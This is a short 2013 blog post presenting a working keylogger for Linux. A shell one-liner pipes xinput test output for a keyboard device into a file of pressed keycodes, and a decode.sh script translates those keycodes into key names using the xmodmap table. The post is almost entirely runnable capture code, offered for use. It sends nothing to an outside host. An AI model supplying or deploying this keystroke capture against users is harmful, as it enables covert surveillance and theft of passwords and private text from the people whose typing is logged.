Tuesday, October 8, 2013

Keylogger for Linux

Dump the keystrokes according to their keycodes to a file called 'dump':
stdbuf -o0 xinput test 11 | stdbuf -o0 awk '/ press /' | stdbuf -o0 awk -F' ' '{print $3}' >> dump

Here, 11 is the standard AT translated keyboard or something. You can figure this number out from the command xinput --list.

Now decode them according to the xmodmap table:

#decode.sh
for line in $(cat dump)
do
    xpr="$(xmodmap -pke | awk "NR==$line-7" | awk '{ print $4}')"
#    echo $xpr
    case "$xpr" in
        Return)
            echo -e "\n" >> out2
            ;;
        space)
            echo " " >> out2
            ;;
        *)
            echo -n $xpr >> out2
    esac
    echo -n " " >> out2
done
echo -e "\n" >> out2
cat out2
##EOF

You might need to edit this file depending upon your xmodmap -pke. For example, the variable assignment NR==$line-7 may need modification since my xmodmap -pke starts from keycode 8and follows the natural order throughout.